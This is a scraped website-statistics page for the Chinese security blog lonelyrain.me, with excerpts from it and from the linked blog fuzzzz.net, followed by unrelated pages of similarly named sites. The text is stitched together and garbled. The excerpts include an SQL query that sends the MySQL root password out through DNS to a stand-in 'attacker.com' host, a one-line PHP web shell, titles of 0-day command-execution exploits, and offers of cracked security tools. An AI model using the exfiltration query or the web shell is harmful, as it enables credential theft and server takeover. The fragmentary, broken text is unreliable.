lonelyrain.me
LonelyRain's BlogMy heart is in the work
http://www.lonelyrain.me/
My heart is in the work
http://www.lonelyrain.me/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Tuesday
LOAD TIME
0.8 seconds
PAGES IN
THIS WEBSITE
19
SSL
EXTERNAL LINKS
8
SITE IP
45.32.253.137
LOAD TIME
0.834 sec
SCORE
6.2
LonelyRain's Blog | lonelyrain.me Reviews
https://lonelyrain.me
My heart is in the work
lonelyrain.me
分类 默认分类 下的文章 - LonelyRain's Blog
http://www.lonelyrain.me/index.php/category/default
February 15, 2017. January 27, 2017. FS段是用来存放当前线程的线程环境块 TEB[Thread Environment Block] 的一个段,FS寄存器本身的值指向的是全局段描述表 GDT 里面相应的一条索引。 当fs寄存器知道了fs段开始的位置之后,它根据相应的偏移量 0x030 找到进程环境块 PEB[Process Environment Block] 在Windbg中可以用. 软件调试 50-54页 & 713-714页. January 14, 2017. Function"}=substr( FILE ,-10,-4);. January 6, 2017. SELECT LOAD FILE(CONCAT(' ',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com foobar') ;. 最终可以看到在不同的环境有两种打开my win open(),open(). Map the error, release the lock, and return -1&...
LonelyRain's Blog
http://www.lonelyrain.me/index.php/page/6
WordPress = 1.5.1.2 - xmlrpc Interface SQL Injection分析. June 14, 2016. WordPress = 1.5.1.2 - xmlrpc Interface SQL Injection分析. 版本: = 1.5.1.2. 发送以下的xmlrpc数据包到wordpress的xmlrpc.php路径上,wordpress就会返回返回一个xmlrpc Response. Xml version=1.0 encoding=iso-8859-1? MethodCall methodName demo.sayHello /methodName /methodCall. MethodCall methodName /methodName params param value /value /param /params /methodCall. Xml version= 1.0? 开始,流程就进入了wordpress所添加的api pingback ping()中. Pagelinkedfrom = $args[0];. Str) $str = mysql ...
杂七杂八 - LonelyRain's Blog
http://www.lonelyrain.me/index.php/misc.html
Https:/ www.notsosecure.com/remote-code-execution-via-php-unserialize/. Http:/ www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html. Http:/ www.suhosin.org/stories/index.html. Metinfo5.3.10 CMS最新版命令执行 文件包含 0Day. 海洋CMS最新版本 V6.28 命令执行 0DAY.
PHP序列化以及反序列化系列[1]--PHP序列化格式 - LonelyRain's Blog
http://www.lonelyrain.me/index.php/archives/273
September 14, 2016. 反序列化 对单一的已序列化的变量进行操作,将其转换回 PHP 的值 zval。 Php var serialize class()函数. Static void php var serialize class(smart str *buf, zval *struc, zval *retval ptr, HashTable *var hash TSRMLS DC) /* { { */ { . incomplete class = php var serialize class name(buf, struc TSRMLS CC); . Php var serialize class name()函数. Php class test { public function show one() { echo $this- one; } public function show two() { echo 123; } }. A:2:{i:0;s:3:foo;i:1;R:2;}. 整个数组代表第一个值, (s:3:"foo") 代表第二个值. Case 's': goto y...
Windows/*nix下DNS传出注入数据的背后 - LonelyRain's Blog
http://www.lonelyrain.me/index.php/archives/315
January 6, 2017. SELECT LOAD FILE(CONCAT(' ',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com foobar') ;. If ( file= mysql file open(key file loadfile, file name- ptr(), O RDONLY, MYF(0) ) 0) goto err;. NULL) { PSI FILE CALL(start file open wait)(locker, src file, src line); file= my open(filename, flags, myFlags); PSI FILE CALL(end file open wait and bind to descriptor)(locker, file); return file; } #endif file= my open(filename, flags, myFlags); return file; }. Host-name: The ...
TOTAL PAGES IN THIS WEBSITE
19
工具 – SudoHac's BLoG.
http://fuzzzz.net/category/tools
老外的开源应用 https:/ github.com/sensepost/reGeorg 非常方便,不用管操作系统,直接传shell上去,然后本. IBM appscan 9.0破解版分享. 最近工作需要安装appscan 但是最新版9.0的网上一直找不到破解版 最终从某大牛那里得到。 非本人破解,只是分享 简介 IBM AppScan该产品是一个领先的 Web 应用安全测试工具,曾以 Watchfire AppScan 的名称享. Php $a=$ GET['a'];$a($ POST['cmd']);? 纯GET POST组成的一句话 链接地址 http:/ www.xxxx.com/shell.p. OpenSSL “heartbleed” 信息泄漏漏洞. Burpsuite pro v1.5.18 破解版. Какие виды камня используются для изгото. 2017 SudoHac's BLoG.
Bash远程解析命令执行漏洞测试方法 – SudoHac's BLoG.
http://fuzzzz.net/pentest/255.html
你的位置 SudoHac's BLoG. BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 此次爆出的漏洞在于BASH处理这样的 函数环境变量 的时候,并没有以函数结尾 } 为结束,而是一直执行其后的shell命令。 GET http:/ help.tenpay.com/cgi-bin/helpcenter/help center.cgi? GET /cgi-bin/helpcenter/help center.cgi? Id=20 HTTP/1.1 Host: help.tenpay.com User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: */* Referer: http:/ www.baidu.com Connection: keep-alive. GET /cgi-bin/helpcenter/help center.cgi?
SudoHac's BLoG.为了梦想 Fighting !-Page 4
http://fuzzzz.net/page/4
SudoHac's BLoG.为了梦想 Fighting! OpenSSL “heartbleed” 信息泄漏漏洞. PHP Safemode & Disable function Bypass [Linux]. 对于Linux提权 如果shell传上去 发现是php开启了安全模式或者禁用了exec system shell exec等等常用的执行命令函数,导致我们无法执行系统命令,可以尝试一下方法绕过 1.安全模式只是对于PHP,所以传一个其他语言的shel. 据我所知,在这个庞大的区域,没有一个 神奇 的答案.分享,共享 我的出发点。 0 00 目录 0x01 链接的构成 0x02 浏览器算如何对url进行解析的 0x03 链接真的只能是这样固定的格式么 0x04 链接真的是你看到的那样么 0 01 链接的构成 链接真的只能固定成我们常用的格式么 不知. 出自 FreebuF.COM 作者 LittleHann 这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。 Какие виды камня используются для изгото.
SudoHac – SudoHac's BLoG.
http://fuzzzz.net/author/root
前几天vBulletin官方论坛被黑,随后一个叫Coldzer0的小哥在1337day上卖vBulletin 5全版本的RCE 0day,看演示很厉害,指哪打哪。 今天我们的威胁情报系统显示知名的web漏洞扫描器AWVS 10被爆出一个本地权限提升漏洞,漏洞详情及POC https:/ www.exploit-db.com/exploits/38847/ 漏洞分析 根据作者的描述,问题是出现在AWVS 10 . 写在前面的话 你是否喜欢漂亮妹子 & am. 最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. Какие виды камня используются для изгото. 2017 SudoHac's BLoG.
WordPress 3.0-3.92 存储型XSS漏洞分析&POC – SudoHac's BLoG.
http://fuzzzz.net/coding/282.html
你的位置 SudoHac's BLoG. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 问题出在wordpress的留言处,通常情况下留言是允许一些html标签的,比如 a 、 B 、 code 等等,然后标签中有一些属性是在白名单里的,比如 a 标签允许href属性,但是onmouseover属性是不允许的。 但是在一个字符串格式化函数wptexturize()上出现了问题,这个函数会在每一个留言上执行,函数的功能是把当前的字符转义成html实体,比如把 转义为“”。 Textarr = preg split('/( .* [.* ])/Us', $text, -1, PREG SPLIT DELIM CAPTURE);. A href="xxx" title="]" /a ["! XSS a /a ]. Function wptexturize($text) { return $text; / 加入这一行 global $wp cockneyreplace;. 转载请注明 SudoHac's BLoG. Siteserver 3.6.3版SQL注入漏洞.
TOTAL LINKS TO THIS WEBSITE
8
lonelyrabbit1754.deviantart.com
LonelyRabbit1754 (Naphatsorn Ornura) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? GIVE ME YA HUG! Digital Art / Hobbyist. Deviant for 2 Years. This deviant's full pageview. Last Visit: 1 week ago. GIVE ME YA HUG! I'm busy for...
我就是我
:: LONELY RADIO :: Eclectic Freeform Internet Radio from One Lonely Guy
Artists of the Month. Lonely Radio is commercial-free freeform Internet radio for split-personalities who want it all. Rock. Country. Blues. Easy Listening. Oldies. Classical. New Age. All mixed together to form an incredible musical jambalaya taken from the last seventy years of recorded music. Click on a player name and start listening:. Here's just a taste of what you'll hear on Lonely Radio:. Eddy Arnold - Cattle Call. Julia Fordham - Happy Ever After. Eagles - Hotel California. Enigma - Mea Culpa.
lonely radio : buzz – "the fate of man is random, so don't look down." — richard hawley
Lonely radio : buzz. The fate of man is random, so don't look down. — richard hawley. Scroll down to content. Stuck in the shadow of an overpass. A different way out of this puzzle. Proudly powered by WordPress.
Lonely Rails | Abandoned Railroad Lines
Abandoned Illinois Railroad Lines. Abandoned Nebraska Railroad Lines. Click on a state. The definitive site for abandoned railroad lines. Proudly powered by WordPress.
LonelyRain's Blog
My heart is in the work. January 6, 2017. SELECT LOAD FILE(CONCAT(' ',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com foobar') ;. If ( file= mysql file open(key file loadfile, file name- ptr(), O RDONLY, MYF(0) ) 0) goto err;. 最终可以看到在不同的环境有两种打开my win open(),open(). Map the error, release the lock, and return -1. note that it's not necessary to call free osfhnd (it hasn't been used yet). */ my osmaperr(GetLastError() ; /* map error */ DBUG RETURN(-1); /* return error to ...Host-...
**Lonely Rainbow**
Lundi, mars 26, 2007. Woman in Chains by Tears for Fears. Qu'est que ça fait du bien de ré-entendre ces petites perles des années 80! Ca, plus quelques rayons de soleil, un bon bouquin d'Anna Gavalda (. Ensemble, c'est tout. Et la vie est presque belle. Publié par Celyn à 13:18. Samedi, mars 24, 2007. Publié par Celyn à 15:33. Mercredi, février 28, 2007. Parce que j'aime beaucoup Klimt et ses tableaux. Parce que j'ai découvert MySpace. Et de nouveaux amis. Parce que je n'oublie pas cet espace, mon espace.
LonelyRainbow's blog - LonelyRainbow - Skyrock.com
More options ▼. Subscribe to my blog. Created: 13/03/2012 at 11:43 AM. Updated: 13/03/2012 at 12:53 PM. Bienvenue dans le monde des Bisounours! N'est pas superficielle, elle aime la mode. N'est pas grosse, elle aime manger. N'est pas bête, elle aime le faire croire. N'est pas désordonnée, elle aime ranger les choses à sa façon. N'est pas narcissique, elle aime les photos. N'est pas bavarde, elle aime parler. N'est pas maniaque, elle aime pas les fautes d'orthographes. You haven't logged in.
Hitam Putih Hidup Remaja
Hitam Putih Hidup Remaja. Jahat and Baik Lumrah Kehidupan. Subscribe to: Posts (Atom). ALOR SETAR, KEDAH, Malaysia. Selalu mengalah.Selalu kalah.Selalu mengalah. Kemenangan Milikmu. View my complete profile.
LonelyRanger :: Tous les Dimanches, un pti kawa - Chaque dimanche, un strip ! Le blog de Reugeu, où on vient se détendre chaque fin de semaine autour d'un bon kawa et des dessins zet travaux d'un acharné du crayon.Ca va chier !
Utilisez notre Reader et abonnez-vous aux meilleurs articles de ce blog! LonelyRanger : Tous les Dimanches, un pti kawa. Chaque dimanche, un strip! Le blog de Reugeu, où on vient se détendre chaque fin de semaine autour d'un bon kawa et des dessins zet travaux d'un acharné du crayon. Ca va chier! Saison 1 : Episode #7 Pink Pouate! Ptain, les gars, 5 jours sans électricité, faut être vraiment poisseux! 06 Saison 1 - Le pote à chichi. Saison 1 : Episode #5 Batman Rertourne! Saison 1 : Episode #3 Solid Shake.
lonelyrangergandalf.deviantart.com
LonelyRangerGandalf (Ranger) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 8 Years. This deviant's full pageview. Last Visit: 42 weeks ago. This is the place where you can personalize your profile! Favourit...
